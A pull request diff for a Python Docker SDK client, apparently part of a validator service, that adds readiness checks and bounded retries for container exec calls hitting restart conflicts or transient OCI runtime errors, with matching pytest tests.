### PR TITLE
DAH-2205: Wait before transient SDK exec retries

### DIFF
--- a/neurons/validators/src/services/rental_docker_sdk.py
+++ b/neurons/validators/src/services/rental_docker_sdk.py
@@ -1,6 +1,7 @@
 from __future__ import annotations
 
 import asyncio
+import logging
 import socket as socket_module
 import tempfile
 import threading
@@ -13,7 +14,9 @@ from datura.requests.miner_requests import ExecutorSSHInfo
 
 
 DEFAULT_DOCKER_PULL_TIMEOUT_SECONDS = 3 * 60 * 60
+_DOCKER_EXEC_RESTART_RETRY_DELAYS_SECONDS = (1, 2, 4, 8)
 _DOCKER_SDK_SSH_ADAPTER_LOCK = threading.Lock()
+logger = logging.getLogger(__name__)
 
 
 class RentalDockerConnectionError(RuntimeError):
@@ -167,12 +170,41 @@ class RentalDockerSdkClient:
             ) from exc
 
     async def exec_in_container(self, spec: ContainerExecSpec) -> ContainerExecResult:
-        try:
-            return await asyncio.to_thread(self._exec_in_container_sync, spec)
-        except Exception as exc:
-            raise RentalDockerOperationError(
-                _wrap_error_message("Docker SDK exec failed", exc)
-            ) from exc
+        last_restart_error: Exception | None = None
+        for attempt in range(len(_DOCKER_EXEC_RESTART_RETRY_DELAYS_SECONDS) + 1):
+            try:
+                return await asyncio.to_thread(self._exec_in_container_sync, spec)
+            except Exception as exc:
+                if not _is_docker_container_restarting_error(exc):
+                    raise RentalDockerOperationError(
+                        _wrap_error_message("Docker SDK exec failed", exc)
+                    ) from exc
+
+                last_restart_error = exc
+                if attempt >= len(_DOCKER_EXEC_RESTART_RETRY_DELAYS_SECONDS):
+                    # Retry budget exhausted; preserve the last Docker restart
+                    # conflict below so callers get the original daemon detail.
+                    break
+
+                delay_seconds = _DOCKER_EXEC_RESTART_RETRY_DELAYS_SECONDS[attempt]
+                logger.warning(
+                    "Docker SDK exec hit transient restarting container state; retrying",
+                    extra={
+                        "container_name": spec.container_name,
+                        "attempt": attempt + 1,
+                        "retry_delay_seconds": delay_seconds,
+                        "error": str(exc),
+                    },
+                )
+                await self._wait_for_container_exec_ready(
+                    spec.container_name,
+                    timeout_seconds=delay_seconds,
+                )
+
+        assert last_restart_error is not None
+        raise RentalDockerOperationError(
+            _wrap_error_message("Docker SDK exec failed", last_restart_error)
+        ) from last_restart_error
 
     async def start(self, *, container_name: str) -> None:
         await self._call_api(
@@ -250,6 +282,45 @@ class RentalDockerSdkClient:
             raise RentalDockerOperationError(
                 _wrap_error_message(f"Docker SDK {operation_label} failed", exc)
             ) from exc
+
+    async def _wait_for_container_exec_ready(
+        self,
+        container_name: str,
+        *,
+        timeout_seconds: int | float,
+    ) -> None:
+        if timeout_seconds <= 0:
+            return
+
+        loop = asyncio.get_running_loop()
+        deadline = loop.time() + timeout_seconds
+        while True:
+            if await asyncio.to_thread(
+                self._is_container_running_and_not_restarting,
+                container_name,
+            ):
+                return
+
+            remaining_seconds = deadline - loop.time()
+            if remaining_seconds <= 0:
+                return
+
+            await asyncio.sleep(min(0.5, remaining_seconds))
+
+    def _is_container_running_and_not_restarting(self, container_name: str) -> bool:
+        inspect_container = getattr(self._api_client, "inspect_container", None)
+        if inspect_container is None:
+            return False
+
+        try:
+            inspect_result = inspect_container(container_name)
+        except Exception:
+            return False
+
+        state = inspect_result.get("State") if isinstance(inspect_result, dict) else None
+        if not isinstance(state, dict):
+            return False
+        return bool(state.get("Running")) and not bool(state.get("Restarting"))
 
     def _run_container_sync(self, spec: ContainerRunSpec) -> None:
         host_config = self._api_client.create_host_config(
@@ -798,6 +869,19 @@ def _is_docker_not_found_error(exc: Exception) -> bool:
         return True
     response = getattr(exc, "response", None)
     return getattr(response, "status_code", None) == 404
+
+
+def _is_docker_container_restarting_error(exc: Exception) -> bool:
+    response = getattr(exc, "response", None)
+    status_code = getattr(response, "status_code", None)
+    message = str(exc).lower()
+    is_restart_conflict = (
+        "is restarting" in message
+        and "wait until the container is running" in message
+    )
+    if status_code is not None:
+        return status_code == 409 and is_restart_conflict
+    return "409" in message and "conflict" in message and is_restart_conflict
 
 
 def _build_docker_ssh_base_url(executor_info: ExecutorSSHInfo) -> str:

--- a/neurons/validators/src/services/rental_docker_sdk.py
+++ b/neurons/validators/src/services/rental_docker_sdk.py
@@ -15,7 +15,9 @@ from datura.requests.miner_requests import ExecutorSSHInfo
 
 
 DEFAULT_DOCKER_PULL_TIMEOUT_SECONDS = 3 * 60 * 60
-_DOCKER_EXEC_RESTART_RETRY_DELAYS_SECONDS = (1, 2, 4, 8)
+_DOCKER_EXEC_READY_TIMEOUT_SECONDS = 15
+_DOCKER_EXEC_READY_POLL_INTERVAL_SECONDS = 0.5
+_DOCKER_EXEC_TRANSIENT_RETRY_DELAYS_SECONDS = (1, 2, 4, 8)
 _DOCKER_SDK_SSH_ADAPTER_LOCK = threading.Lock()
 logger = logging.getLogger(__name__)
 
@@ -110,6 +112,13 @@ class ContainerExecResult:
     stderr: str = ""
 
 
+@dataclass(slots=True)
+class _ContainerExecReadiness:
+    ready: bool
+    terminal: bool
+    detail: str
+
+
 class RentalDockerSdkClient:
     def __init__(
         self,
@@ -172,8 +181,13 @@ class RentalDockerSdkClient:
 
     async def exec_in_container(self, spec: ContainerExecSpec) -> ContainerExecResult:
         last_restart_error: Exception | None = None
-        for attempt in range(len(_DOCKER_EXEC_RESTART_RETRY_DELAYS_SECONDS) + 1):
+        for attempt in range(len(_DOCKER_EXEC_TRANSIENT_RETRY_DELAYS_SECONDS) + 1):
             retry_result: ContainerExecResult | None = None
+            # A container can pass start/running checks while still moving through
+            # transient restart/runtime states where exec is rejected or runc cannot
+            # enter its namespaces/cgroups. Inspect first, then keep a narrow retry
+            # for the remaining inspect-vs-exec race.
+            await self._wait_for_container_exec_ready(spec.container_name)
             try:
                 result = await asyncio.to_thread(self._exec_in_container_sync, spec)
             except Exception as exc:
@@ -207,10 +221,8 @@ class RentalDockerSdkClient:
                 attempt=attempt + 1,
                 delay_seconds=delay_seconds,
             )
-            await self._wait_for_container_exec_ready(
-                spec.container_name,
-                timeout_seconds=delay_seconds,
-            )
+            if delay_seconds > 0:
+                await asyncio.sleep(delay_seconds)
 
         assert last_restart_error is not None
         raise RentalDockerOperationError(
@@ -298,40 +310,76 @@ class RentalDockerSdkClient:
         self,
         container_name: str,
         *,
-        timeout_seconds: int | float,
+        timeout_seconds: int | float | None = None,
     ) -> None:
-        if timeout_seconds <= 0:
-            return
+        if timeout_seconds is None:
+            timeout_seconds = _DOCKER_EXEC_READY_TIMEOUT_SECONDS
 
         loop = asyncio.get_running_loop()
         deadline = loop.time() + timeout_seconds
         while True:
-            if await asyncio.to_thread(
-                self._is_container_running_and_not_restarting,
+            readiness = await asyncio.to_thread(
+                self._inspect_container_exec_readiness,
                 container_name,
-            ):
+            )
+            if readiness.ready:
                 return
+            if readiness.terminal:
+                raise RentalDockerOperationError(
+                    f"Docker container is not ready for exec: {readiness.detail}"
+                )
 
             remaining_seconds = deadline - loop.time()
             if remaining_seconds <= 0:
-                return
+                raise RentalDockerOperationError(
+                    "Docker container did not become ready for exec "
+                    f"after {timeout_seconds} seconds: {readiness.detail}"
+                )
 
-            await asyncio.sleep(min(0.5, remaining_seconds))
+            await asyncio.sleep(
+                min(_DOCKER_EXEC_READY_POLL_INTERVAL_SECONDS, remaining_seconds)
+            )
 
-    def _is_container_running_and_not_restarting(self, container_name: str) -> bool:
+    def _inspect_container_exec_readiness(
+        self,
+        container_name: str,
+    ) -> _ContainerExecReadiness:
         inspect_container = getattr(self._api_client, "inspect_container", None)
         if inspect_container is None:
-            return False
+            raise RentalDockerOperationError(
+                "Docker SDK inspect container is unavailable"
+            )
 
         try:
             inspect_result = inspect_container(container_name)
-        except Exception:
-            return False
+        except Exception as exc:
+            raise RentalDockerOperationError(
+                _wrap_error_message("Docker SDK inspect container failed", exc)
+            ) from exc
 
         state = inspect_result.get("State") if isinstance(inspect_result, dict) else None
         if not isinstance(state, dict):
-            return False
-        return bool(state.get("Running")) and not bool(state.get("Restarting"))
+            return _ContainerExecReadiness(
+                ready=False,
+                terminal=False,
+                detail="Docker inspect did not include container State",
+            )
+
+        running = bool(state.get("Running"))
+        restarting = bool(state.get("Restarting"))
+        paused = bool(state.get("Paused"))
+        dead = bool(state.get("Dead"))
+        ready = running and not restarting and not paused and not dead
+        terminal = paused or dead or (
+            not running
+            and not restarting
+            and str(state.get("Status") or "").lower() != "created"
+        )
+        return _ContainerExecReadiness(
+            ready=ready,
+            terminal=terminal,
+            detail=_format_container_state_detail(state),
+        )
 
     def _run_container_sync(self, spec: ContainerRunSpec) -> None:
         host_config = self._api_client.create_host_config(
@@ -920,10 +968,23 @@ def _format_exec_result_failure(result: ContainerExecResult) -> str:
     )
 
 
+def _format_container_state_detail(state: dict) -> str:
+    fields = {
+        "status": state.get("Status"),
+        "running": state.get("Running"),
+        "restarting": state.get("Restarting"),
+        "paused": state.get("Paused"),
+        "dead": state.get("Dead"),
+        "exit_code": state.get("ExitCode"),
+        "error": state.get("Error"),
+    }
+    return " ".join(f"{key}={value!r}" for key, value in fields.items())
+
+
 def _retry_delay_for_exec_attempt(attempt: int) -> int | float | None:
-    if attempt >= len(_DOCKER_EXEC_RESTART_RETRY_DELAYS_SECONDS):
+    if attempt >= len(_DOCKER_EXEC_TRANSIENT_RETRY_DELAYS_SECONDS):
         return None
-    return _DOCKER_EXEC_RESTART_RETRY_DELAYS_SECONDS[attempt]
+    return _DOCKER_EXEC_TRANSIENT_RETRY_DELAYS_SECONDS[attempt]
 
 
 def _log_transient_exec_retry(

--- a/neurons/validators/src/services/rental_docker_sdk.py
+++ b/neurons/validators/src/services/rental_docker_sdk.py
@@ -10,6 +10,7 @@ from contextlib import asynccontextmanager, suppress
 from dataclasses import dataclass, field
 from pathlib import Path
 
+from core.utils import _m, get_extra_info
 from datura.requests.miner_requests import ExecutorSSHInfo
 
 
@@ -172,34 +173,44 @@ class RentalDockerSdkClient:
     async def exec_in_container(self, spec: ContainerExecSpec) -> ContainerExecResult:
         last_restart_error: Exception | None = None
         for attempt in range(len(_DOCKER_EXEC_RESTART_RETRY_DELAYS_SECONDS) + 1):
+            retry_result: ContainerExecResult | None = None
             try:
-                return await asyncio.to_thread(self._exec_in_container_sync, spec)
+                result = await asyncio.to_thread(self._exec_in_container_sync, spec)
             except Exception as exc:
                 if not _is_docker_container_restarting_error(exc):
                     raise RentalDockerOperationError(
                         _wrap_error_message("Docker SDK exec failed", exc)
                     ) from exc
-
                 last_restart_error = exc
-                if attempt >= len(_DOCKER_EXEC_RESTART_RETRY_DELAYS_SECONDS):
-                    # Retry budget exhausted; preserve the last Docker restart
-                    # conflict below so callers get the original daemon detail.
-                    break
+                retry_reason = "container_restarting"
+                retry_error = str(exc)
+            else:
+                if not _is_transient_oci_exec_result(result):
+                    return result
+                retry_result = result
+                retry_reason = "oci_runtime_exec_transient"
+                retry_error = _format_exec_result_failure(result)
 
-                delay_seconds = _DOCKER_EXEC_RESTART_RETRY_DELAYS_SECONDS[attempt]
-                logger.warning(
-                    "Docker SDK exec hit transient restarting container state; retrying",
-                    extra={
-                        "container_name": spec.container_name,
-                        "attempt": attempt + 1,
-                        "retry_delay_seconds": delay_seconds,
-                        "error": str(exc),
-                    },
-                )
-                await self._wait_for_container_exec_ready(
-                    spec.container_name,
-                    timeout_seconds=delay_seconds,
-                )
+            delay_seconds = _retry_delay_for_exec_attempt(attempt)
+            if delay_seconds is None:
+                # Nonzero exec results keep the existing caller behavior after
+                # retry budget is exhausted. Exception-based failures have no
+                # result, so preserve the original Docker daemon detail below.
+                if retry_result is not None:
+                    return retry_result
+                break
+
+            _log_transient_exec_retry(
+                spec=spec,
+                retry_reason=retry_reason,
+                retry_error=retry_error,
+                attempt=attempt + 1,
+                delay_seconds=delay_seconds,
+            )
+            await self._wait_for_container_exec_ready(
+                spec.container_name,
+                timeout_seconds=delay_seconds,
+            )
 
         assert last_restart_error is not None
         raise RentalDockerOperationError(
@@ -882,6 +893,61 @@ def _is_docker_container_restarting_error(exc: Exception) -> bool:
     if status_code is not None:
         return status_code == 409 and is_restart_conflict
     return "409" in message and "conflict" in message and is_restart_conflict
+
+
+def _is_transient_oci_exec_result(result: ContainerExecResult) -> bool:
+    if result.exit_status == 0:
+        return False
+
+    message = f"{result.stdout}\n{result.stderr}".lower()
+    if "oci runtime exec failed" not in message:
+        return False
+
+    return any(
+        transient_marker in message
+        for transient_marker in (
+            "executing setns process caused",
+            "cgroup.procs",
+            "init.scope (deleted)",
+        )
+    )
+
+
+def _format_exec_result_failure(result: ContainerExecResult) -> str:
+    return (
+        f"exit_status={result.exit_status}; "
+        f"stderr={result.stderr}; stdout={result.stdout}"
+    )
+
+
+def _retry_delay_for_exec_attempt(attempt: int) -> int | float | None:
+    if attempt >= len(_DOCKER_EXEC_RESTART_RETRY_DELAYS_SECONDS):
+        return None
+    return _DOCKER_EXEC_RESTART_RETRY_DELAYS_SECONDS[attempt]
+
+
+def _log_transient_exec_retry(
+    *,
+    spec: ContainerExecSpec,
+    retry_reason: str,
+    retry_error: str,
+    attempt: int,
+    delay_seconds: int | float,
+) -> None:
+    logger.warning(
+        _m(
+            "Docker SDK exec hit transient container state; retrying",
+            extra=get_extra_info(
+                {
+                    "container_name": spec.container_name,
+                    "attempt": attempt,
+                    "retry_delay_seconds": delay_seconds,
+                    "retry_reason": retry_reason,
+                    "error": retry_error,
+                }
+            ),
+        )
+    )
 
 
 def _build_docker_ssh_base_url(executor_info: ExecutorSSHInfo) -> str:

--- a/neurons/validators/tests/test_rental_docker_sdk.py
+++ b/neurons/validators/tests/test_rental_docker_sdk.py
@@ -6,7 +6,9 @@ from pathlib import Path
 from unittest.mock import Mock
 
 import pytest
+from docker.errors import APIError
 
+import services.rental_docker_sdk as rental_docker_sdk
 from datura.requests.miner_requests import ExecutorSSHInfo
 from services.rental_docker_sdk import (
     ContainerExecSpec,
@@ -46,6 +48,7 @@ class FakeApiClient:
         self.exec_created = []
         self.exec_started = []
         self.exec_inspected = []
+        self.containers_inspected = []
         self.pruned_images = False
         self.created_volumes = []
         self.removed_volumes = []
@@ -86,6 +89,10 @@ class FakeApiClient:
         self.exec_inspected.append(exec_id)
         return {"ExitCode": 0}
 
+    def inspect_container(self, container_name):
+        self.containers_inspected.append(container_name)
+        return {"State": {"Running": True, "Restarting": False}}
+
     def prune_images(self):
         self.pruned_images = True
         return {"ImagesDeleted": []}
@@ -99,6 +106,58 @@ class FakeApiClient:
 
     def close(self):
         self.closed = True
+
+
+def _container_restarting_error() -> APIError:
+    return APIError(
+        '409 Client Error for http+docker://ssh/v1.52/containers/pod_exec/exec: '
+        'Conflict ("Container abc123 is restarting, wait until the container is running")'
+    )
+
+
+def _other_conflict_error() -> APIError:
+    return APIError(
+        '409 Client Error for http+docker://ssh/v1.52/containers/pod_exec/exec: '
+        'Conflict ("container name is already in use")'
+    )
+
+
+class RestartingExecCreateApiClient(FakeApiClient):
+    def __init__(self):
+        super().__init__()
+        self.remaining_restarts = 1
+
+    def exec_create(self, **kwargs):
+        self.exec_created.append(kwargs)
+        if self.remaining_restarts:
+            self.remaining_restarts -= 1
+            raise _container_restarting_error()
+        return {"Id": "exec-id"}
+
+
+class RestartingExecStartApiClient(FakeApiClient):
+    def __init__(self):
+        super().__init__()
+        self.remaining_restarts = 1
+        self.next_exec_id = 0
+
+    def exec_create(self, **kwargs):
+        self.exec_created.append(kwargs)
+        self.next_exec_id += 1
+        return {"Id": f"exec-id-{self.next_exec_id}"}
+
+    def exec_start(self, exec_id, **kwargs):
+        self.exec_started.append((exec_id, kwargs))
+        if self.remaining_restarts:
+            self.remaining_restarts -= 1
+            raise _container_restarting_error()
+        return (b"stdout", b"stderr")
+
+
+class OtherConflictExecCreateApiClient(FakeApiClient):
+    def exec_create(self, **kwargs):
+        self.exec_created.append(kwargs)
+        raise _other_conflict_error()
 
 
 class SocketExecApiClient(FakeApiClient):
@@ -365,6 +424,128 @@ async def test_exec_in_container_with_stdin_demuxes_socket_stdout_and_stderr():
         }
     ]
     assert api_client.exec_started == [("exec-id", {"socket": True})]
+
+
+@pytest.mark.asyncio
+async def test_exec_in_container_retries_transient_container_restarting_on_exec_create(monkeypatch):
+    monkeypatch.setattr(
+        rental_docker_sdk,
+        "_DOCKER_EXEC_RESTART_RETRY_DELAYS_SECONDS",
+        (0,),
+    )
+    api_client = RestartingExecCreateApiClient()
+    client = RentalDockerSdkClient(api_client)
+
+    result = await client.exec_in_container(
+        ContainerExecSpec(
+            container_name="pod_exec",
+            argv=("sh", "-c", "cat /tmp/file"),
+        )
+    )
+
+    assert result.exit_status == 0
+    assert result.stdout == "stdout"
+    assert len(api_client.exec_created) == 2
+    assert api_client.exec_started == [("exec-id", {"demux": True})]
+
+
+@pytest.mark.asyncio
+async def test_exec_in_container_waits_for_container_ready_after_restart(monkeypatch):
+    monkeypatch.setattr(
+        rental_docker_sdk,
+        "_DOCKER_EXEC_RESTART_RETRY_DELAYS_SECONDS",
+        (5,),
+    )
+    api_client = RestartingExecCreateApiClient()
+    client = RentalDockerSdkClient(api_client)
+
+    result = await client.exec_in_container(
+        ContainerExecSpec(
+            container_name="pod_exec",
+            argv=("sh", "-c", "cat /tmp/file"),
+        )
+    )
+
+    assert result.exit_status == 0
+    assert api_client.containers_inspected == ["pod_exec"]
+    assert len(api_client.exec_created) == 2
+
+
+@pytest.mark.asyncio
+async def test_exec_in_container_retries_transient_container_restarting_on_exec_start(monkeypatch):
+    monkeypatch.setattr(
+        rental_docker_sdk,
+        "_DOCKER_EXEC_RESTART_RETRY_DELAYS_SECONDS",
+        (0,),
+    )
+    api_client = RestartingExecStartApiClient()
+    client = RentalDockerSdkClient(api_client)
+
+    result = await client.exec_in_container(
+        ContainerExecSpec(
+            container_name="pod_exec",
+            argv=("sh", "-c", "cat /tmp/file"),
+        )
+    )
+
+    assert result.exit_status == 0
+    assert result.stdout == "stdout"
+    assert len(api_client.exec_created) == 2
+    assert api_client.exec_started == [
+        ("exec-id-1", {"demux": True}),
+        ("exec-id-2", {"demux": True}),
+    ]
+
+
+@pytest.mark.asyncio
+async def test_exec_in_container_keeps_original_restart_conflict_after_retry_budget(monkeypatch):
+    monkeypatch.setattr(
+        rental_docker_sdk,
+        "_DOCKER_EXEC_RESTART_RETRY_DELAYS_SECONDS",
+        (0, 0),
+    )
+    api_client = RestartingExecCreateApiClient()
+    api_client.remaining_restarts = 10
+    client = RentalDockerSdkClient(api_client)
+
+    with pytest.raises(
+        RentalDockerOperationError,
+        match="Container abc123 is restarting, wait until the container is running",
+    ):
+        await client.exec_in_container(
+            ContainerExecSpec(
+                container_name="pod_exec",
+                argv=("sh", "-c", "cat /tmp/file"),
+            )
+        )
+
+    assert len(api_client.exec_created) == 3
+    assert api_client.exec_started == []
+
+
+@pytest.mark.asyncio
+async def test_exec_in_container_does_not_retry_other_conflicts(monkeypatch):
+    monkeypatch.setattr(
+        rental_docker_sdk,
+        "_DOCKER_EXEC_RESTART_RETRY_DELAYS_SECONDS",
+        (0, 0),
+    )
+    api_client = OtherConflictExecCreateApiClient()
+    client = RentalDockerSdkClient(api_client)
+
+    with pytest.raises(
+        RentalDockerOperationError,
+        match="container name is already in use",
+    ):
+        await client.exec_in_container(
+            ContainerExecSpec(
+                container_name="pod_exec",
+                argv=("sh", "-c", "cat /tmp/file"),
+            )
+        )
+
+    assert len(api_client.exec_created) == 1
+    assert api_client.containers_inspected == []
 
 
 def test_stdin_exec_spec_builders_keep_values_out_of_argv():

--- a/neurons/validators/tests/test_rental_docker_sdk.py
+++ b/neurons/validators/tests/test_rental_docker_sdk.py
@@ -47,6 +47,29 @@ CGROUP_OCI_EXEC_ERROR = (
 )
 
 
+def _container_state(
+    *,
+    status: str = "running",
+    running: bool = True,
+    restarting: bool = False,
+    paused: bool = False,
+    dead: bool = False,
+    exit_code: int = 0,
+    error: str = "",
+) -> dict:
+    return {
+        "State": {
+            "Status": status,
+            "Running": running,
+            "Restarting": restarting,
+            "Paused": paused,
+            "Dead": dead,
+            "ExitCode": exit_code,
+            "Error": error,
+        }
+    }
+
+
 class FakeApiClient:
     def __init__(self):
         self.login_calls = []
@@ -60,6 +83,8 @@ class FakeApiClient:
         self.exec_started = []
         self.exec_inspected = []
         self.containers_inspected = []
+        self.container_states = None
+        self.events = []
         self.pruned_images = False
         self.created_volumes = []
         self.removed_volumes = []
@@ -89,6 +114,7 @@ class FakeApiClient:
         self.started.append(container_name)
 
     def exec_create(self, **kwargs):
+        self.events.append("exec_create")
         self.exec_created.append(kwargs)
         return {"Id": "exec-id"}
 
@@ -101,7 +127,12 @@ class FakeApiClient:
         return {"ExitCode": 0}
 
     def inspect_container(self, container_name):
+        self.events.append("inspect_container")
         self.containers_inspected.append(container_name)
+        if self.container_states is not None:
+            if len(self.container_states) > 1:
+                return self.container_states.pop(0)
+            return self.container_states[0]
         return {"State": {"Running": True, "Restarting": False}}
 
     def prune_images(self):
@@ -139,6 +170,7 @@ class RestartingExecCreateApiClient(FakeApiClient):
         self.remaining_restarts = 1
 
     def exec_create(self, **kwargs):
+        self.events.append("exec_create")
         self.exec_created.append(kwargs)
         if self.remaining_restarts:
             self.remaining_restarts -= 1
@@ -153,6 +185,7 @@ class RestartingExecStartApiClient(FakeApiClient):
         self.next_exec_id = 0
 
     def exec_create(self, **kwargs):
+        self.events.append("exec_create")
         self.exec_created.append(kwargs)
         self.next_exec_id += 1
         return {"Id": f"exec-id-{self.next_exec_id}"}
@@ -167,6 +200,7 @@ class RestartingExecStartApiClient(FakeApiClient):
 
 class OtherConflictExecCreateApiClient(FakeApiClient):
     def exec_create(self, **kwargs):
+        self.events.append("exec_create")
         self.exec_created.append(kwargs)
         raise _other_conflict_error()
 
@@ -187,6 +221,7 @@ class ExecResultApiClient(FakeApiClient):
         self.next_exec_id = 0
 
     def exec_create(self, **kwargs):
+        self.events.append("exec_create")
         self.exec_created.append(kwargs)
         self.next_exec_id += 1
         return {"Id": f"exec-id-{self.next_exec_id}"}
@@ -440,6 +475,7 @@ async def test_exec_in_container_passes_argv_and_environment_as_data():
         }
     ]
     assert api_client.exec_started == [("exec-id", {"demux": True})]
+    assert api_client.containers_inspected == ["pod_exec"]
 
 
 @pytest.mark.asyncio
@@ -470,13 +506,95 @@ async def test_exec_in_container_with_stdin_demuxes_socket_stdout_and_stderr():
         }
     ]
     assert api_client.exec_started == [("exec-id", {"socket": True})]
+    assert api_client.containers_inspected == ["pod_exec"]
+
+
+@pytest.mark.asyncio
+async def test_exec_in_container_waits_for_container_ready_before_first_exec(monkeypatch):
+    monkeypatch.setattr(rental_docker_sdk, "_DOCKER_EXEC_READY_POLL_INTERVAL_SECONDS", 0)
+    api_client = FakeApiClient()
+    api_client.container_states = [
+        _container_state(status="restarting", running=True, restarting=True),
+        _container_state(status="restarting", running=True, restarting=True),
+        _container_state(),
+    ]
+    client = RentalDockerSdkClient(api_client)
+
+    result = await client.exec_in_container(
+        ContainerExecSpec(
+            container_name="pod_exec",
+            argv=("sh", "-c", "cat /tmp/file"),
+        )
+    )
+
+    assert result.exit_status == 0
+    assert result.stdout == "stdout"
+    assert api_client.events == [
+        "inspect_container",
+        "inspect_container",
+        "inspect_container",
+        "exec_create",
+    ]
+    assert len(api_client.exec_created) == 1
+
+
+@pytest.mark.asyncio
+async def test_exec_in_container_fails_without_exec_when_container_exited():
+    api_client = FakeApiClient()
+    api_client.container_states = [
+        _container_state(
+            status="exited",
+            running=False,
+            exit_code=42,
+            error="startup command failed",
+        )
+    ]
+    client = RentalDockerSdkClient(api_client)
+
+    with pytest.raises(
+        RentalDockerOperationError,
+        match="status='exited'.*exit_code=42.*startup command failed",
+    ):
+        await client.exec_in_container(
+            ContainerExecSpec(
+                container_name="pod_exec",
+                argv=("sh", "-c", "cat /tmp/file"),
+            )
+        )
+
+    assert api_client.exec_created == []
+    assert api_client.events == ["inspect_container"]
+
+
+@pytest.mark.asyncio
+async def test_exec_in_container_fails_without_exec_when_container_never_ready(monkeypatch):
+    monkeypatch.setattr(rental_docker_sdk, "_DOCKER_EXEC_READY_TIMEOUT_SECONDS", 0)
+    api_client = FakeApiClient()
+    api_client.container_states = [
+        _container_state(status="restarting", running=True, restarting=True)
+    ]
+    client = RentalDockerSdkClient(api_client)
+
+    with pytest.raises(
+        RentalDockerOperationError,
+        match="did not become ready for exec",
+    ):
+        await client.exec_in_container(
+            ContainerExecSpec(
+                container_name="pod_exec",
+                argv=("sh", "-c", "cat /tmp/file"),
+            )
+        )
+
+    assert api_client.exec_created == []
+    assert api_client.events == ["inspect_container"]
 
 
 @pytest.mark.asyncio
 async def test_exec_in_container_retries_transient_container_restarting_on_exec_create(monkeypatch):
     monkeypatch.setattr(
         rental_docker_sdk,
-        "_DOCKER_EXEC_RESTART_RETRY_DELAYS_SECONDS",
+        "_DOCKER_EXEC_TRANSIENT_RETRY_DELAYS_SECONDS",
         (0,),
     )
     api_client = RestartingExecCreateApiClient()
@@ -493,14 +611,15 @@ async def test_exec_in_container_retries_transient_container_restarting_on_exec_
     assert result.stdout == "stdout"
     assert len(api_client.exec_created) == 2
     assert api_client.exec_started == [("exec-id", {"demux": True})]
+    assert api_client.containers_inspected == ["pod_exec", "pod_exec"]
 
 
 @pytest.mark.asyncio
-async def test_exec_in_container_waits_for_container_ready_after_restart(monkeypatch):
+async def test_exec_in_container_rechecks_readiness_before_retry(monkeypatch):
     monkeypatch.setattr(
         rental_docker_sdk,
-        "_DOCKER_EXEC_RESTART_RETRY_DELAYS_SECONDS",
-        (5,),
+        "_DOCKER_EXEC_TRANSIENT_RETRY_DELAYS_SECONDS",
+        (0,),
     )
     api_client = RestartingExecCreateApiClient()
     client = RentalDockerSdkClient(api_client)
@@ -513,7 +632,7 @@ async def test_exec_in_container_waits_for_container_ready_after_restart(monkeyp
     )
 
     assert result.exit_status == 0
-    assert api_client.containers_inspected == ["pod_exec"]
+    assert api_client.containers_inspected == ["pod_exec", "pod_exec"]
     assert len(api_client.exec_created) == 2
 
 
@@ -521,7 +640,7 @@ async def test_exec_in_container_waits_for_container_ready_after_restart(monkeyp
 async def test_exec_in_container_retries_transient_container_restarting_on_exec_start(monkeypatch):
     monkeypatch.setattr(
         rental_docker_sdk,
-        "_DOCKER_EXEC_RESTART_RETRY_DELAYS_SECONDS",
+        "_DOCKER_EXEC_TRANSIENT_RETRY_DELAYS_SECONDS",
         (0,),
     )
     api_client = RestartingExecStartApiClient()
@@ -541,13 +660,14 @@ async def test_exec_in_container_retries_transient_container_restarting_on_exec_
         ("exec-id-1", {"demux": True}),
         ("exec-id-2", {"demux": True}),
     ]
+    assert api_client.containers_inspected == ["pod_exec", "pod_exec"]
 
 
 @pytest.mark.asyncio
 async def test_exec_in_container_keeps_original_restart_conflict_after_retry_budget(monkeypatch):
     monkeypatch.setattr(
         rental_docker_sdk,
-        "_DOCKER_EXEC_RESTART_RETRY_DELAYS_SECONDS",
+        "_DOCKER_EXEC_TRANSIENT_RETRY_DELAYS_SECONDS",
         (0, 0),
     )
     api_client = RestartingExecCreateApiClient()
@@ -567,13 +687,14 @@ async def test_exec_in_container_keeps_original_restart_conflict_after_retry_bud
 
     assert len(api_client.exec_created) == 3
     assert api_client.exec_started == []
+    assert api_client.containers_inspected == ["pod_exec", "pod_exec", "pod_exec"]
 
 
 @pytest.mark.asyncio
 async def test_exec_in_container_does_not_retry_other_conflicts(monkeypatch):
     monkeypatch.setattr(
         rental_docker_sdk,
-        "_DOCKER_EXEC_RESTART_RETRY_DELAYS_SECONDS",
+        "_DOCKER_EXEC_TRANSIENT_RETRY_DELAYS_SECONDS",
         (0, 0),
     )
     api_client = OtherConflictExecCreateApiClient()
@@ -591,7 +712,7 @@ async def test_exec_in_container_does_not_retry_other_conflicts(monkeypatch):
         )
 
     assert len(api_client.exec_created) == 1
-    assert api_client.containers_inspected == []
+    assert api_client.containers_inspected == ["pod_exec"]
 
 
 @pytest.mark.parametrize(
@@ -608,8 +729,8 @@ async def test_exec_in_container_retries_transient_oci_exec_result(
 ):
     monkeypatch.setattr(
         rental_docker_sdk,
-        "_DOCKER_EXEC_RESTART_RETRY_DELAYS_SECONDS",
-        (5,),
+        "_DOCKER_EXEC_TRANSIENT_RETRY_DELAYS_SECONDS",
+        (0,),
     )
     api_client = ExecResultApiClient(
         failing_stdout=transient_stdout,
@@ -631,15 +752,15 @@ async def test_exec_in_container_retries_transient_oci_exec_result(
         ("exec-id-1", {"demux": True}),
         ("exec-id-2", {"demux": True}),
     ]
-    assert api_client.containers_inspected == ["pod_exec"]
+    assert api_client.containers_inspected == ["pod_exec", "pod_exec"]
 
 
 @pytest.mark.asyncio
 async def test_exec_in_container_returns_transient_oci_result_after_retry_budget(monkeypatch):
     monkeypatch.setattr(
         rental_docker_sdk,
-        "_DOCKER_EXEC_RESTART_RETRY_DELAYS_SECONDS",
-        (5, 5),
+        "_DOCKER_EXEC_TRANSIENT_RETRY_DELAYS_SECONDS",
+        (0, 0),
     )
     api_client = ExecResultApiClient(
         failing_stdout=SETNS_OCI_EXEC_ERROR,
@@ -658,14 +779,14 @@ async def test_exec_in_container_returns_transient_oci_result_after_retry_budget
     assert result.exit_status == 128
     assert result.stdout == SETNS_OCI_EXEC_ERROR
     assert len(api_client.exec_created) == 3
-    assert api_client.containers_inspected == ["pod_exec", "pod_exec"]
+    assert api_client.containers_inspected == ["pod_exec", "pod_exec", "pod_exec"]
 
 
 @pytest.mark.asyncio
 async def test_exec_in_container_does_not_retry_non_transient_oci_result(monkeypatch):
     monkeypatch.setattr(
         rental_docker_sdk,
-        "_DOCKER_EXEC_RESTART_RETRY_DELAYS_SECONDS",
+        "_DOCKER_EXEC_TRANSIENT_RETRY_DELAYS_SECONDS",
         (0, 0),
     )
     api_client = ExecResultApiClient(
